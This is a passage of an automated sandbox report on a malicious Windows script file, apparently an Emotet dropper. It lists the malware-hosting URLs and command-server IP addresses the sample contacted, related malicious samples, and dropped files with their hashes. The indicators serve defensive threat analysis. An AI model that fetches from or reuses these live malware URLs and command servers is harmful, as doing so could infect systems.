00000001.00000003.1519488621.000002D846065000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845E94000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: malware
        		unknown
        http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/zMwscript.exe, 00000001.00000003.1417227468.000002D845C90000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://160.16.142.56:8080/regsvr32.exe, 00000004.00000002.2661608245.0000000000D6A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.2661608245.0000000000D51000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://91.121.146.47:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/regsvr32.exe, 00000004.00000002.2660986060.0000000000C99000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://penshorn.org/admin/Ses8712iGR8du/95DC4.tmp.dll(wscript.exe, 00000001.00000002.1551840814.000002D84606B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514223112.000002D84605E000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://www.gomespontes.com.br/logs/pd/0wwscript.exe, 00000001.00000003.1541349732.000002D846702000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1553706057.000002D84672F000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        http://softwareulike.com/cWIYxWMPkK/_wscript.exe, 00000001.00000003.1417301254.000002D845C83000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://160.16.142.56:8080/)regsvr32.exe, 00000004.00000002.2661608245.0000000000D51000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/476wscript.exe, 00000001.00000003.1531992780.000002D8464BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552238532.000002D8464BB000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: malware
        		unknown

        World Map of Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public IPs

        IPDomainCountryFlagASNASN NameMalicious
        52.109.13.63
        		unknownUnited States
        		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
        110.232.117.186
        		unknownAustralia
        		56038RACKCORP-APRackCorpAUtrue
        103.132.242.26
        		unknownIndia
        		45117INPL-IN-APIshansNetworkINtrue
        104.168.155.143
        		unknownUnited States
        		54290HOSTWINDSUStrue
        79.137.35.198
        		unknownFrance
        		16276OVHFRtrue
        115.68.227.76
        		unknownKorea Republic of
        		38700SMILESERV-AS-KRSMILESERVKRtrue
        163.44.196.120
        		unknownSingapore
        		135161GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSGtrue
        206.189.28.199
        		unknownUnited States
        		14061DIGITALOCEAN-ASNUStrue
        31.31.196.172
        		bbvoyage.comRussian Federation
        		197695AS-REGRUtrue
        186.202.153.5
        		gomespontes.com.brBrazil
        		27715LocawebServicosdeInternetSABRtrue
        203.26.41.131
        		penshorn.orgAustralia
        		38719DREAMSCAPE-AS-APDreamscapeNetworksLimitedAUtrue
        107.170.39.149
        		unknownUnited States
        		14061DIGITALOCEAN-ASNUStrue
        66.228.32.31
        		unknownUnited States
        		63949LINODE-APLinodeLLCUStrue
        197.242.150.244
        		unknownSouth Africa
        		37611AfrihostZAtrue
        185.4.135.165
        		unknownGreece
        		199246TOPHOSTGRtrue
        183.111.227.137
        		unknownKorea Republic of
        		4766KIXS-AS-KRKoreaTelecomKRtrue
        45.176.232.124
        		unknownColombia
        		267869CABLEYTELECOMUNICACIONESDECOLOMBIASASCABLETELCOCtrue
        169.57.156.166
        		unknownUnited States
        		36351SOFTLAYERUStrue
        164.68.99.3
        		unknownGermany
        		51167CONTABODEtrue
        139.59.126.41
        		unknownSingapore
        		14061DIGITALOCEAN-ASNUStrue
        167.172.253.162
        		unknownUnited States
        		14061DIGITALOCEAN-ASNUStrue
        167.172.199.165
        		unknownUnited States
        		14061DIGITALOCEAN-ASNUStrue
        202.129.205.3
        		unknownThailand
        		45328NIPA-AS-THNIPATECHNOLOGYCOLTDTHtrue
        147.139.166.154
        		unknownUnited States
        		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
        153.92.5.27
        		unknownGermany
        		47583AS-HOSTINGERLTtrue
        159.65.88.10
        		unknownUnited States
        		14061DIGITALOCEAN-ASNUStrue
        172.105.226.75
        		unknownUnited States
        		63949LINODE-APLinodeLLCUStrue
        164.90.222.65
        		unknownUnited States
        		14061DIGITALOCEAN-ASNUStrue
        213.239.212.5
        		unknownGermany
        		24940HETZNER-ASDEtrue
        5.135.159.50
        		unknownFrance
        		16276OVHFRtrue
        186.194.240.217
        		unknownBrazil
        		262733NetceteraTelecomunicacoesLtdaBRtrue
        119.59.103.152
        		unknownThailand
        		56067METRABYTE-TH453LadplacoutJorakhaebuaTHtrue
        159.89.202.34
        		unknownUnited States
        		14061DIGITALOCEAN-ASNUStrue
        91.121.146.47
        		unknownFrance
        		16276OVHFRtrue
        160.16.142.56
        		unknownJapan9370SAKURA-BSAKURAInternetIncJPtrue
        201.94.166.162
        		unknownBrazil
        		28573CLAROSABRtrue
        91.207.28.33
        		unknownKyrgyzstan
        		39819PROHOSTKGtrue
        103.75.201.2
        		unknownThailand
        		133496CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTHtrue
        103.43.75.120
        		unknownJapan20473AS-CHOOPAUStrue
        188.44.20.25
        		unknownMacedonia
        		57374GIV-ASMKtrue
        45.235.8.30
        		unknownBrazil
        		267405WIKINETTELECOMUNICACOESBRtrue
        153.126.146.25
        		unknownJapan7684SAKURA-ASAKURAInternetIncJPtrue
        72.15.201.15
        		unknownUnited States
        		13649ASN-VINSUStrue
        187.63.160.88
        		unknownBrazil
        		28169BITCOMPROVEDORDESERVICOSDEINTERNETLTDABRtrue
        82.223.21.224
        		unknownSpain
        		8560ONEANDONE-ASBrauerstrasse48DEtrue
        173.212.193.249
        		unknownGermany
        		51167CONTABODEtrue
        95.217.221.146
        		unknownGermany
        		24940HETZNER-ASDEtrue
        149.56.131.28
        		unknownCanada
        		16276OVHFRtrue
        182.162.143.56
        		unknownKorea Republic of
        		3786LGDACOMLGDACOMCorporationKRtrue
        1.234.2.232
        		unknownKorea Republic of
        		9318SKB-ASSKBroadbandCoLtdKRtrue
        192.229.221.95
        		unknownUnited States
        		15133EDGECASTUSfalse
        129.232.188.93
        		unknownSouth Africa
        		37153xneeloZAtrue
        52.109.76.141
        		unknownUnited States
        		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
        94.23.45.86
        		unknownFrance
        		16276OVHFRtrue

        General Information

        Joe Sandbox Version:37.0.0 Beryl
        Analysis ID:830321
        Start date and time:2023-03-20 09:06:00 +01:00
        Joe Sandbox Product:CloudBasic
        Overall analysis duration:0h 5m 52s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:defaultwindowsinteractivecookbook.jbs
        Analysis system description:Windows 10 64 bit version 1909 (MS Office 2019, IE 11, Chrome 104, Firefox 88, Adobe Reader DC 21, Java 8 u291, 7-Zip)
        Number of analysed new started processes analysed:6
        Number of new started drivers analysed:0
        Number of existing processes analysed:1
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • HDC enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample file name:click.wsf
        Detection:MAL
        Classification:mal100.troj.evad.winWSF@5/8@3/54
        EGA Information:
        • Successful, ratio: 100%
        HDC Information:
        • Successful, ratio: 50.2% (good quality ratio 42.4%)
        • Quality average: 60.5%
        • Quality standard deviation: 35.6%
        HCA Information:
        • Successful, ratio: 80%
        • Number of executed functions: 15
        • Number of non-executed functions: 135
        Cookbook Comments:
        • Found application associated with file extension: .wsf

        Warnings

        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, svchost.exe
        • Excluded IPs from analysis (whitelisted): 93.184.221.240, 8.253.95.121, 8.241.121.126, 8.241.123.126, 8.248.135.254, 67.27.234.126
        • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, login.live.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net
        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtProtectVirtualMemory calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.

        Simulations

        Behavior and APIs

        TimeTypeDescription
        09:06:48API Interceptor2x Sleep call for process: wscript.exe modified
        09:07:20API Interceptor8x Sleep call for process: regsvr32.exe modified

        Joe Sandbox View / Context

        IPs

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        52.109.13.63https://wy3k.adj.st/deeplink_default_appopen?adj_t=om3pxuk_zgvu7py&adj_campaign=branded_app_collateral_socal-la_sp21-5147&adj_adgroup=prov_socal-la_all_email&adj_creative=tickler-all-others&adj_fallback=https%3a%2f%2f22rkb9.codesandbox.io?gq=Y2xlYWh5QGhhcnJpc3dpbGxpYW1zLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
          script.ps1Get hashmaliciousQbotBrowse
            https://uoe-my.sharepoint.com/:o:/g/personal/s2151826_ed_ac_uk/EiPbnSU15bJOkC7l4WxhV6AByYfAdUA_gJQfZBOPJcLdUA?e=bXwVkRGet hashmaliciousHTMLPhisherBrowse
              https://eurofinsgenomics.com/handlers/sitenavigator.aspx?returnurl=https://joyaconstructora.com%2F%2F%2F%2F%2F%2F%2F%2F/auth/%2F%2F%2F%2F/l8vf5r%2F%2F%2F%2Fno.scammer@nope.comGet hashmaliciousHTMLPhisherBrowse
                http://45.50.233.214:443Get hashmaliciousUnknownBrowse
                  ID-FACT.1678955800.zipGet hashmaliciousUnknownBrowse
                    http://www.gerardosmarketplace.comGet hashmaliciousUnknownBrowse
                      Agreement_138439_Mar4.zipGet hashmaliciousQbotBrowse
                        PO-465514-180820.doc.zipGet hashmaliciousUnknownBrowse
                          20230314_170734_96KdjxuP4otsx8GvtUhxd7dKxlCZ9X3d.emlGet hashmaliciousHTMLPhisherBrowse
                            https://zsyqplxqhppbvzsqnfap7te6tabckg3sq3wfqkmbjymzhvyu-ipfs-dweb-link.translate.goog/alldomail.html?_x_tr_hp=bafybeibmec&_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp#test@test.comGet hashmaliciousHTMLPhisherBrowse
                              dominos.com.my Expired Password Notification.msgGet hashmaliciousUnknownBrowse
                                EFT PaymentsEQSKRPJHR-135711.msgGet hashmaliciousHTMLPhisherBrowse
                                  Quia.htmlGet hashmaliciousQbotBrowse
                                    RECIBO MTCN.rarGet hashmaliciousFormBookBrowse
                                      Quidem.htmlGet hashmaliciousHtmlDropperBrowse
                                        #Ufe0fATT53546789b.htmGet hashmaliciousHTMLPhisherBrowse
                                          DocumentVaudoise.htmlGet hashmaliciousUnknownBrowse
                                            https://isonglobal-my.sharepoint.com/Get hashmaliciousUnknownBrowse
                                              https://tinker.canksru.ru/Mjjohnson@edgewortheconomics.comGet hashmaliciousUnknownBrowse

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                bbvoyage.comForm - 16 Mar, 2023.oneGet hashmaliciousEmotetBrowse
                                                • 31.31.196.172
                                                penshorn.orgForm - 16 Mar, 2023.oneGet hashmaliciousEmotetBrowse
                                                • 203.26.41.131
                                                MBQ24253060297767042_202303161424.oneGet hashmaliciousEmotetBrowse
                                                • 203.26.41.131
                                                iMedPub_LTD_4.oneGet hashmaliciousEmotetBrowse
                                                • 203.26.41.131
                                                iMedPub_LTD_6.oneGet hashmaliciousEmotetBrowse
                                                • 203.26.41.131
                                                INNOVINC.oneGet hashmaliciousEmotetBrowse
                                                • 203.26.41.131
                                                Insight_Medical_Publishing_2.oneGet hashmaliciousEmotetBrowse
                                                • 203.26.41.131
                                                Insight_Medical_Publishing_1.oneGet hashmaliciousEmotetBrowse
                                                • 203.26.41.131
                                                Insight_Medical_Publishing_3.oneGet hashmaliciousEmotetBrowse
                                                • 203.26.41.131
                                                Insight_Medical_Publishing_4.oneGet hashmaliciousEmotetBrowse
                                                • 203.26.41.131
                                                OMICS_Online_1.oneGet hashmaliciousEmotetBrowse
                                                • 203.26.41.131
                                                Insight_Medical_Publishing.oneGet hashmaliciousEmotetBrowse
                                                • 203.26.41.131
                                                Omics_Journal.oneGet hashmaliciousEmotetBrowse
                                                • 203.26.41.131
                                                OMICS.oneGet hashmaliciousEmotetBrowse
                                                • 203.26.41.131
                                                OPAST_GROUP_1.oneGet hashmaliciousEmotetBrowse
                                                • 203.26.41.131
                                                OPAST_GROUP_LLC.oneGet hashmaliciousEmotetBrowse
                                                • 203.26.41.131
                                                OPAST_GROUP.oneGet hashmaliciousEmotetBrowse
                                                • 203.26.41.131
                                                Opast_International.oneGet hashmaliciousEmotetBrowse
                                                • 203.26.41.131
                                                opastonline.com.oneGet hashmaliciousEmotetBrowse
                                                • 203.26.41.131
                                                Opast_Publishing_Group_1.oneGet hashmaliciousEmotetBrowse
                                                • 203.26.41.131
                                                Opast_Publishing_Group.oneGet hashmaliciousEmotetBrowse
                                                • 203.26.41.131

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                MICROSOFT-CORP-MSN-AS-BLOCKUShttps://lp.constantcontactpages.com/cu/YWZoQqoGet hashmaliciousHTMLPhisherBrowse
                                                • 52.109.76.141
                                                https://ipfs.io/ipfs/bafybeieqwjihauwgqt7xc6em5fjahc6wprftgeacb4ba3nfn6hk5c5lgky/chenjeffente_cham_ev14.html#for.transition.support@casa.gov.auGet hashmaliciousUnknownBrowse
                                                • 52.109.76.141
                                                #Ud83d#Udce7#U2122 Payment Advice Note-05318.htmGet hashmaliciousHTMLPhisherBrowse
                                                • 52.109.32.24
                                                #Ud83d#Udce7#U2122 Payment Advice Note-05318.htmGet hashmaliciousHTMLPhisherBrowse
                                                • 52.109.32.24
                                                oXMenI45tQ.exeGet hashmaliciousFormBookBrowse
                                                • 20.216.185.237
                                                MS.Update.Center.Security.KB464397.msiGet hashmaliciousUnknownBrowse
                                                • 52.109.76.141
                                                Win10.Update-kb8723467.msiGet hashmaliciousUnknownBrowse
                                                • 52.109.13.64
                                                https://rheba218.softr.app/Get hashmaliciousHTMLPhisherBrowse
                                                • 52.109.32.24
                                                ORr6fNn67s.exeGet hashmaliciousAmadey, Babuk, Djvu, SmokeLoader, VidarBrowse
                                                • 20.189.173.20
                                                x86_64.elfGet hashmaliciousMirai, MoobotBrowse
                                                • 52.244.252.204
                                                dupa.ps1Get hashmaliciousUnknownBrowse
                                                • 52.109.76.141
                                                lHb3Vvmlxg.elfGet hashmaliciousMiraiBrowse
                                                • 163.228.43.5
                                                Q5QuwXOwrT.elfGet hashmaliciousMiraiBrowse
                                                • 155.62.200.99
                                                setup.exeGet hashmaliciousAmadey, Djvu, RHADAMANTHYS, SmokeLoader, VidarBrowse
                                                • 20.189.173.20
                                                setup.exeGet hashmaliciousAmadey, Babuk, Djvu, Fabookie, RedLine, SmokeLoader, VidarBrowse
                                                • 20.42.65.92
                                                setup.exeGet hashmaliciousAmadey, Djvu, Fabookie, RHADAMANTHYS, SmokeLoader, VidarBrowse
                                                • 104.208.16.94
                                                setup.exeGet hashmaliciousAmadey, Djvu, SmokeLoader, VidarBrowse
                                                • 20.189.173.20
                                                bNQF3pHHKw.elfGet hashmaliciousMiraiBrowse
                                                • 22.66.9.58
                                                CP8IIerCXD.elfGet hashmaliciousMiraiBrowse
                                                • 22.171.139.219
                                                yGJHQ8Sasb.elfGet hashmaliciousMiraiBrowse
                                                • 20.209.183.200

                                                JA3 Fingerprints

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                72a589da586844d7f0818ce684948eeaaOHLlvfakv.dllGet hashmaliciousEmotetBrowse
                                                • 164.90.222.65
                                                aOHLlvfakv.dllGet hashmaliciousEmotetBrowse
                                                • 164.90.222.65
                                                PO0000001552.xlsGet hashmaliciousEmotetBrowse
                                                • 164.90.222.65
                                                W-9 form.zipGet hashmaliciousEmotetBrowse
                                                • 164.90.222.65
                                                U_0211.zipGet hashmaliciousEmotetBrowse
                                                • 164.90.222.65
                                                cdmwqddqir.exeGet hashmaliciousTrickbotBrowse
                                                • 164.90.222.65
                                                roben.dllGet hashmaliciousTrickbotBrowse
                                                • 164.90.222.65
                                                c85WWDlKf2.dllGet hashmaliciousTrickbotBrowse
                                                • 164.90.222.65
                                                WLBu7dTvsC.dllGet hashmaliciousTrickbotBrowse
                                                • 164.90.222.65
                                                SecuriteInfo.com.Trojan.GenericKDZ.80412.21668.dllGet hashmaliciousTrickbotBrowse
                                                • 164.90.222.65
                                                ZokRhfJSrx.exeGet hashmaliciousTrickbotBrowse
                                                • 164.90.222.65
                                                84NKc3571B.exeGet hashmaliciousTrickbotBrowse
                                                • 164.90.222.65
                                                SecuriteInfo.com.ML.PE-A.26667.dllGet hashmaliciousTrickBotBrowse
                                                • 164.90.222.65
                                                HOPdc7v13C.exeGet hashmaliciousTrickBotBrowse
                                                • 164.90.222.65
                                                soccer.png.dllGet hashmaliciousTrickBotBrowse
                                                • 164.90.222.65
                                                SXCjsXDXXU.exeGet hashmaliciousTrickBotBrowse
                                                • 164.90.222.65
                                                dngqoAXyDd.exeGet hashmaliciousTrickBotBrowse
                                                • 164.90.222.65
                                                nWKik9o8eY.exeGet hashmaliciousTrickBotBrowse
                                                • 164.90.222.65
                                                5zzdHIYZAG.exeGet hashmaliciousTrickBotBrowse
                                                • 164.90.222.65
                                                r433fCa9zW.exeGet hashmaliciousTrickBotBrowse
                                                • 164.90.222.65

                                                Dropped Files

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                C:\Users\user\Desktop\rad75349.tmp.dllForm - 16 Mar, 2023.oneGet hashmaliciousEmotetBrowse
                                                  MBQ24253060297767042_202303161424.oneGet hashmaliciousEmotetBrowse
                                                    iMedPub_LTD_4.oneGet hashmaliciousEmotetBrowse
                                                      iMedPub_LTD_6.oneGet hashmaliciousEmotetBrowse
                                                        INNOVINC.oneGet hashmaliciousEmotetBrowse
                                                          Insight_Medical_Publishing_2.oneGet hashmaliciousEmotetBrowse
                                                            Insight_Medical_Publishing_1.oneGet hashmaliciousEmotetBrowse
                                                              Insight_Medical_Publishing_3.oneGet hashmaliciousEmotetBrowse
                                                                Insight_Medical_Publishing_4.oneGet hashmaliciousEmotetBrowse
                                                                  OMICS_Online_1.oneGet hashmaliciousEmotetBrowse
                                                                    Insight_Medical_Publishing.oneGet hashmaliciousEmotetBrowse
                                                                      Omics_Journal.oneGet hashmaliciousEmotetBrowse
                                                                        OMICS.oneGet hashmaliciousEmotetBrowse
                                                                          OPAST_GROUP_1.oneGet hashmaliciousEmotetBrowse
                                                                            OPAST_GROUP_LLC.oneGet hashmaliciousEmotetBrowse
                                                                              OPAST_GROUP.oneGet hashmaliciousEmotetBrowse
                                                                                Opast_International.oneGet hashmaliciousEmotetBrowse
                                                                                  opastonline.com.oneGet hashmaliciousEmotetBrowse
                                                                                    Opast_Publishing_Group_1.oneGet hashmaliciousEmotetBrowse
                                                                                      Opast_Publishing_Group.oneGet hashmaliciousEmotetBrowse

                                                                                        Created / dropped Files

                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\regsvr32.exe
                                                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 62582 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                        Category:dropped
                                                                                        Size (bytes):62582
                                                                                        Entropy (8bit):7.996063107774368
                                                                                        Encrypted:true
                                                                                        SSDEEP:1536:Jk3XPi43VgGp0gB2itudTSRAn/TWTdWftu:CHa43V5p022iZ4CgA
                                                                                        MD5:E71C8443AE0BC2E282C73FAEAD0A6DD3
                                                                                        SHA1:0C110C1B01E68EDFACAEAE64781A37B1995FA94B
                                                                                        SHA-256:95B0A5ACC5BF70D3ABDFD091D0C9F9063AA4FDE65BD34DBF16786082E1992E72
                                                                                        SHA-512:B38458C7FA2825AFB72794F374827403D5946B1132E136A0CE075DFD351277CF7D957C88DC8A1E4ADC3BCAE1FA8010DAE3831E268E910D517691DE24326391A6
                                                                                        Malicious:false
                                                                                        Reputation:moderate, very likely benign file
                                                                                        Preview:MSCF....v.......,...................I.................BVrl .authroot.stl....oJ5..CK..8U....a..3.1.P. J.".t..2F2e.dHH......$E.KB.2D..-SJE....^..'..y.}..,{m.....\...]4.G.......h....148...e.gr.....48:.L...g.....Xef.x:..t...J...6-....kW6Z>....&......ye.U.Q&z:.vZ..._....a...]..T.E.....B.h.,...[....V.O.3..EW.x.?.Q..$.@.W..=.B.f..8a.Y.JK..g./%p..C.4CD.s..Jd.u..@.g=...a.. .h%..'.xjy7.E..\.....A..':.4TdW?Ko3$.Hg.z.d~....../q..C.....`...A[ W(.........9...GZ.;....l&?........F...p?... .p.....{S.L4..v.+...7.T?.....p..`..&..9.......f...0+.L.....1.2b)..vX5L'.~....2vz.,E.Ni.{#...o..w.?.#.3..h.v<.S%.].tD@!Le.w.q.7.8....QW.FT.....hE.........Y............./.%Q...k...*.Y.n..v.A..../...>B..5\..-Ko.......O<.b.K.{.O.b...._.7...4.;%9N..K.X>......kg-9..r.c.g.G|.*[.-...HT...",?.q...ad....7RE.......!f..#../....?.-.^.K.c^...+{.g......]<..$.=.O....ii7.wJ+S..Z..d.....>..J*...T..Q7..`.r,<$....\d:K`..T.n....N.....C..j.;.1SX..j....1...R....+....Yg....]....3..9..S..D..`.

                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\regsvr32.exe
                                                                                        File Type:data
                                                                                        Category:modified
                                                                                        Size (bytes):328
                                                                                        Entropy (8bit):3.127437612314223
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:kKnMAry/7UN+SkQlPlEGYRMY9z+4KlDA3RUecZUt:PMoCvkPlE99SNxAhUext
                                                                                        MD5:DB2EC1D25EBBF63A67B76A991DE9381B
                                                                                        SHA1:ED66F35D9308016B4F276CC09C3B2116669070E5
                                                                                        SHA-256:E7E343FE929301E443F44F2842348A4875C87ABD0CF3B2F29403C96A660344AA
                                                                                        SHA-512:03D7D4AE006B25E50EA4F98ADD852997D7E11A6064AE0334A2BA0D0056E15F5C432990EDC79FA4C00F57A0A44C71982DC302636E17F46A95CAE85814AF7400FC
                                                                                        Malicious:false
                                                                                        Preview:p...... ........Z.L..[..(....................................................... ..........).K......&...........v...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.2.f.9.2.9.a.7.4.b.d.9.1.:.0."...

                                                                                        C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_13929_20386-20230320T0906180748-804.etl

                                                                                        Download File
                                                                                        Process:C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                        File Type:old-fs dump file (16-bit, assuming PDP-11 endianness), Previous dump Thu Jan 1 01:07:36 1970, This dump Thu Jan 1 01:09:04 1970,
                                                                                        Category:modified
                                                                                        Size (bytes):8192
                                                                                        Entropy (8bit):4.3056677894243895
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:oG+4F4x8t4OU4oxJN4rXVJVpV+VuVSV1y8wfZu+E+d2nYgFxvZPEGsj6xYw6vMI:TU8c9dK2nrFrTCMI
                                                                                        MD5:8A4B17DA69383C75316D7488A1F36DEB
                                                                                        SHA1:04AA89B2ECD1EA38D81AD9865450CF02F9A709C5
                                                                                        SHA-256:882EE2DE3174D9BA48B2B58B5ACEA99F69EB8D5594F7ED2DD5C6C7FA47B71B2A
                                                                                        SHA-512:E397B0E0D7701583A8E2CCD097E78A881C826B7DC0696595107657DEDEF826FAED3D522C80605ED83B7119081667DA58730A65BFE6828C25BF7E02404AD8A654
                                                                                        Malicious:false
                                                                                        Preview:........0........_k..[..&........................... ...h.1.<...8 .~<...X...........$.....?..[..#..*...C.L...0T.j...................B.........................[.X...........$.....?..[..#..*...C.L...0T.j...............[...B.........................f.`...........$.....?..[..#..*...C.L...0T.i................&..B...............................................$.....?..[..0.K(.J.J.C...............@....... ..B.......................M.i.c.r.o.s.o.f.t...O.f.f.i.c.e...O.u.t.l.o.o.k...C.l.o.u.d.S.e.t.t.i.n.g.s...D.e.f.a.u.l.t.E.n.a.b.l.e.d.S.t.a.t.u.s...].......0.0.............$.....?..[..0.K(.J.J.C...............@........1.B.......................M.i.c.r.o.s.o.f.t...O.f.f.i.c.e...O.u.t.l.o.o.k...R.i.p.C.o.r.d...4.7.2.6.4.2.8...........0.P...........$....HF..[....{(.Z/K.i.a..ZIs.................9.B...................P...........$....HF..[....{(.Z/K.i.a..ZIt.................F.B...................P...........$....HF..[....{(.Z/K.i.a..ZIs.................M.B...................P...........$....HF..[..

                                                                                        C:\Users\user\Desktop\click.wsf

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\wscript.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):9
                                                                                        Entropy (8bit):2.94770277922009
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:tWn:tWn
                                                                                        MD5:07F5A0CFFD9B2616EA44FB90CCC04480
                                                                                        SHA1:641B12C5FFA1A31BC367390E34D441A9CE1958EE
                                                                                        SHA-256:A0430A038E7D879375C9CA5BF94CB440A3B9A002712118A7BCCC1FF82F1EA896
                                                                                        SHA-512:09E7488C138DEAD45343A79AD0CB37036C5444606CDFD8AA859EE70227A96964376A17F07E03D0FC353708CA9AAF979ABF8BC917E6C2D005A0052575E074F531
                                                                                        Malicious:true
                                                                                        Preview:badum tss

                                                                                        C:\Users\user\Desktop\rad1F9A4.tmp.dll

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\wscript.exe
                                                                                        File Type:HTML document, ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):381
                                                                                        Entropy (8bit):5.035593451835013
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:pn0+Dy9xwq8B0hEr6VHB0SpMAcg/EzBoAuZ2A3b1AYDAJgXPUhA1QCV2AmWZW5Kk:J0+oxb8ShRZSS146Ai2A3JAhSPEAr1mP
                                                                                        MD5:118A489422BE0C5CA0CECF3BB7903C7E
                                                                                        SHA1:B90AF089FD0E728E61D532BE80062AED39D98978
                                                                                        SHA-256:FF6D14F77E27F7B90CB2F20BCE408189F5F388961F3FCD13FE2DF2CC0A002DC3
                                                                                        SHA-512:283CD22F52BCCB8DD22A8772E8121302A6975F2DE35540122F1F7B38953F0BB015831999733884686C1A9019034D2CC113F81245F53B84EDD02B8ADB94638D40
                                                                                        Malicious:true
                                                                                        Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>401 Unauthorized</title>.</head><body>.<h1>Unauthorized</h1>.<p>This server could not verify that you.are authorized to access the document.requested. Either you supplied the wrong.credentials (e.g., bad password), or your.browser doesn't understand how to supply.the credentials required.</p>.</body></html>.

                                                                                        C:\Users\user\Desktop\rad75349.tmp.dll

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\wscript.exe
                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):316928
                                                                                        Entropy (8bit):7.337848702590508
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:cwNQMQTlfdUPABVy559hhR3iP7TfPYbrF1EFVw0todxKROsCt:rNbadDBkZ6rPeEFizdxxsCt
                                                                                        MD5:BFC060937DC90B273ECCB6825145F298
                                                                                        SHA1:C156C00C7E918F0CB7363614FB1F177C90D8108A
                                                                                        SHA-256:2F39C2879989DDD7F9ECF52B6232598E5595F8BF367846FF188C9DFBF1251253
                                                                                        SHA-512:CC1FEE19314B0A0F9E292FA84F6E98F087033D77DB937848DDA1DA0C88F49997866CBA5465DF04BF929B810B42FDB81481341064C4565C9B6272FA7F3B473AC5
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 79%
                                                                                        Joe Sandbox View:
                                                                                        • Filename: Form - 16 Mar, 2023.one, Detection: malicious, Browse
                                                                                        • Filename: MBQ24253060297767042_202303161424.one, Detection: malicious, Browse
                                                                                        • Filename: iMedPub_LTD_4.one, Detection: malicious, Browse
                                                                                        • Filename: iMedPub_LTD_6.one, Detection: malicious, Browse
                                                                                        • Filename: INNOVINC.one, Detection: malicious, Browse
                                                                                        • Filename: Insight_Medical_Publishing_2.one, Detection: malicious, Browse
